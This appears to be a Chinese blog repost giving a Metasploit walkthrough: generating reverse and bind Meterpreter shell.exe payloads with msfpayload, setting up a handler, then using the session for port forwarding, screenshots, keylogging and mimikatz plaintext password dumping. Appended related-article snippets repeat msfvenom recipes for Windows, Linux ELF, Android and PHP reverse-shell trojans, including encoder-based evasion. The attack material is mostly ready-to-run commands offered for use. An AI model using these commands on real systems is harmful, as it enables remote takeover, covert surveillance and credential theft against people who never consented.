kali生成shell监听目标主机

最新推荐文章于 2022-11-15 08:32:46 发布
最新推荐文章于 2022-11-15 08:32:46 发布
阅读量616 收藏 2
点赞数
文章标签: shell
原文链接:http://www.cnblogs.com/winalva/p/4039339.html
版权

生成监听用的shell.exe:

reverse_tcp(反向连接)

path : payload/windows/meterpreter/reverse_tcp

msfpayload windows/meterpreter/reverse_tcp LHOST=192.168.1.2 LPORT=8080 X > ~/Desktop/shell.exe

 

reverse_http/https(反向连接)

path:payload/windows/meterpreter/reverse_http/https

msfpayload windows/meterpreter/reverse_https LHOST=192.168.1.2 LPORT=8080 X > ~/Desktop/shell.exe

通过http/https的方式反向连接,在网速慢的情况下不稳定,在某博客上看到https如果反弹没有收到数据,可以将监听端口换成443试试。

 

bind_tcp(正向连接)

path : payload/windows/meterpreter/bind_tcp

正向连接shell,因为在内网跨网段时无法连接到attack的机器,所以在内网中经常会使用,不需要设置LHOST。

 

 

利用shell.exe监听:

msf > use exploit/multi/handler

msf exploit(handler) > set payload windows/meterpreter/reverse_tcp

msf exploit(handler) > set LHOST 192.168.1.2

msf exploit(handler) > set LPORT 8080

msf exploit(handler) > exploit -j

msf exploit(handler) >sessions

 

基本命令:

enter image description here

常用命令:

background:将当前会话放置后台
load/use:加载模块
Interact:切换进一个信道
migrate:迁移进程
run:执行一个已有的模块,这里要说的是输入run后按两下tab,会列出所有的已有的脚本,常用的有autoroute,hashdump,arp_scanner,multi_meter_inject等。
Resource:执行一个已有的rc脚本。

写入文件夹:
meterpreter > pwd
meterpreter > cd C:\\
meterpreter > pwd
meterpreter > mkdir Hacked by AutoRoot
meterpreter > ls

 

写入内容:

edit + 文件,调用vi编辑。

 

网络相关:

网络命令则有列出ip信息(ipconfig),展示修改路由表(route),还有端口转发(portfwd)

meterpreter > portfwd
meterpreter > portfwd add -l 1314 -p 3389 -r 192.168.1.2

在建立规则之后就可以连接本地1314端口,这样远程的3389端口就转发出来了

 

键盘监听:

meterpreter > screenshot
meterpreter > keyscan_start
meterpreter > keyscan_dump

注意一下windows会话窗口的概念,windows桌面划分为不同的会话(session),以便于与windows交互。会话0代表控制台,1,2 代表远程桌面。所以要截获键盘输入必须在0中进行。可 以使用getdesktop查看或者截张图试试。否则使用setdesktop切换。

如果不行就切换到explorer.exe进程中,这样也可以监听到远程桌面连接进来之后的键盘输入数据。

 

mimikatz:

抓取明文

第一条:privilege::debug
                //提升权限
第二条:sekurlsa::logonpasswords
              //抓取密码

 

 

 



 

转载于:https://www.cnblogs.com/winalva/p/4039339.html

weixin_33805557
关注
  • 0
    点赞
  • 2
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
msf生成linux elf木反弹shell
shatianyzg的博客
06-13 1557
攻击机:Kali 192.168.241.128 靶机:centos 7 192.168.241.129 msfvenom -p linux/x64/meterpreter/reverse_tcp LHOST=xxx.xxx.xxx.xxx LPORT=8888 -f elf > mshell.elf各参数解释: inux/x64/meterpreter/reverse_tcp //这是反弹的payload LHOST=xxx.xxx.xxx.xxx //这里写kali的ip LPORT //写k
kali使用nc监听后,利用win7进行反弹shell
xiaochenhang的博客
08-15 1476
这里win7使用netcat进行反弹shell
使用kali制作母
weixin_43326436的博客
04-24 266
攻击机:kali2019 靶机:win764 步骤: 1.开启两个虚拟机 2.制作母 命令: msfvenom -p windows/meterpreter/reverse_tcp -e x86/shikata_ga_nai -i 5 -b ‘0x00’ LHOST=kali的IP LPORT=4444(端口随便写) -f exe >goji.exe(exe名字可以自己命名) 这时在主文件夹里面可以看见制作好的goji.exe母程序 3.在kali里面开启监听 启动msf:命令:msfconsol
KALI用MSF监听Windows7
weixin_60689826的博客
08-23 1045
利用MSF监听WIN7
Kali--meterpreter找不到shell选项meterpreter > shell [-] Unknown command: shell.
齐泽文的Blog
04-22 1万+
今天在使用kali进行学习是,发现在进入meterpreter控制台后只有core命令,刚开始以为是虚拟机坏掉了,后来发现,是因为没有连接成功,1.问题重现:root@qzwhost:~# msfconsole _ ...
kali学习4——使用msfvenom制作exe木
不会心跳的博客
01-29 5743
使用msfvenom制作exe木文件 1. msfvenom msfvenom是msfpayload,msfencode的结合体。使用msfvenom制作木的思路是,木目标机上执行后,向本机发送信息,而本机则需要开启监听状态,收到信息后则进行连接。 2. 制作木 msfvenom制作木需要的参数很多: root@kali:~# msfvenom -h MsfVenom - a Metasploit standalone payload generator. Also a replacement
msf之msfvenom的使用—使用Kali渗透工具生成远控木
GUN_C的博客
11-15 3884
msfvenom的使用
kali linux 支持什么编程语言_渗透过程中可能要用到的Kali工具小总结
weixin_39576066的博客
10-24 2714
渗透过程中可能要用到的Kali工具小总结写在最前面最近在搞渗透的时候,发现过程中有一些kali工具还是很适合使用的所以写一个渗透过程中可能用到的kali渗透工具的小小总结写的不对 多多包涵 各位大佬轻喷 :DKali用得好 牢饭准管饱渗透不规范 亲人两行泪先来了解一下Kali(From Wikipdeia)Kali Linux是基于Debian的Linux发行版, 设计用于数字取证操作系统。由Of...
Kali 下对安卓手机的攻击
m0_66524548的博客
01-29 1万+
写在前面:本文仅限学术交流,请勿用他人实践 Kali对安卓手机的攻击(渗透) 我们首先需要确定本机IP 这很简单,对于Kali来说我们需要打开终端并键入 ifconfig 即可获取自己的IP,然后我们需要确定安卓手机也就是被攻击者的IP,只需键入 fping -g 本机IP地址/24 这时我们就能确定目标IP,这次教程主要围绕创建后门程序展开 在终端中执行: # msfvenom -p android/meterpreter/reverse_tcp LHOST=目标IP LPORT=
Kali中的反向Shell攻击与防范
反向Shell攻击是一种常见的网络安全攻击手段,其原理是攻击者通过在受害主机上部署恶意代码,并与其建立一个反向Shell连接,从而获取对目标系统的控制权限。攻击者可以通过这样的渠道执行各种攻击操作,包括文件操作...
Linux利用nc命令监控服务器端口的方法
11-12
最近碰到一个项目,前端用apache htttpd进行发布(80端口),通过双机负载均衡转发到后端的两个tomcat进行处理(8081和8082端口),现在需要随时监控这三个端口的情况,一旦down掉需要能够立即告警处理。批量的系统监控比较好的是用nagios软件来实现,这样小项目专门装一个nagios软件,有点繁琐了。在网上查了一些资料,总结实验了一下,可以用简单的nc命令来实现。
python pyhook
u011739633的专栏
06-06 1117
..
kali linux内网监听
qq_29847119的博客
09-07 4978
1开启流量转发 echo 1 > /proc/sys/net/ipv4/ip_forward 2.打开ettercap ettercap -G 扫描目标,目标target1,网关target2. 3打开driftnet -i etn0  4.打开urlsnark 5打开zenmap  
Kali的学习笔记篇(八)使用msf生成shellcode制作免杀payload
Kind&红衣的博客
08-13 6557
环境:     kali-linux-2018.2-amd.iso       Visual Studio 2017     msfvenom    更新时间:2018年8月13日07:06:43 直接注入的生成方式(一): //生成c格式的后门,-p指定模块,-e 指定编码,-i指定编码次数,-f 输出格式,-b 去除指定代码 root@kali:~# msfvenom -p wi...
linux shell脚本编写_如何利用case语句编写shell脚本?
weixin_39768083的博客
11-24 479
概述shell一个命令解释器,是一个程序/bin/bash,解释linux的命令,而shell脚本是一系列的命令组成的文件,想要熟练掌握shell脚本,唯有不断练习,接触各种各样的需求并用shell来实现才可以。需求利用case语句编写脚本,满足下列要求1.执行create时根据userfile和passfile建立用户2.执行delete时根据userfile删除用户1、脚本内容:# vim ...
kali linux捆绑工具shellter的安装及使用
wkend的博客
03-16 1万+
kali linux捆绑工具shellter的安装及使用 按图所示输入命令 2.输入shellter,出现下图所示表示安装成功 shellter的使用 1.从浏览器下载putty,并且剪切到home目录下 2.在这里提示有三种操作模式 - A:自动 - M:管理者,高级模式 - H:帮助选项 在这里我们输入A,选择自动模式 3.输入pe t...
【渗透测试】kali使用教程(一):常用命令和基本工具使用
热门推荐
u011871680的博客
12-03 4万+
kali教程
MSF建立webshell后门,并监听端口建立session连接
土拨鼠挖洞中的博客
06-23 1万+
一   建立反弹后门msfvenom -p php/meterpreter/reverse_tcpLHOST=192.168.2.146 LPORT=5555 R > test3.php 注:生成的反弹木存放在当前用户home目录下;将生成的木上传到目标机中,可以远程访问;windows下asp反弹木:root@kali:~# msfvenom -p windows/meterpret...
端口扫描详解(kali linux)
xk的博客
05-03 3万+
简介 nmap 是被专业人员广泛使用的一款端口扫描工具,使用灵活,它已经是渗透人员必备的工具。还具备以下功能 (1)主机探测:Nmap 可查找目标网络中的在线主机。默认情况下,Nmap通过4方式———ICMP echo 请求(ping)、向 443 端口发送 TCP SYN 包、向80 端口发送 TCP ACK包和ICMP 时间戳请求——发现目标主机。 (2)服务/版本检测:在发现开放端口后...
kali获得shell软件
最新发布
07-10
Kali Linux是一个流行的渗透测试和网络安全评估操作系统,它提供了许多用于获取shell的工具和技术。这些工具和技术可以用于测试和评估系统的安全性。 一些常用的工具和技术包括: 1. Metasploit:Metasploit是一个...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值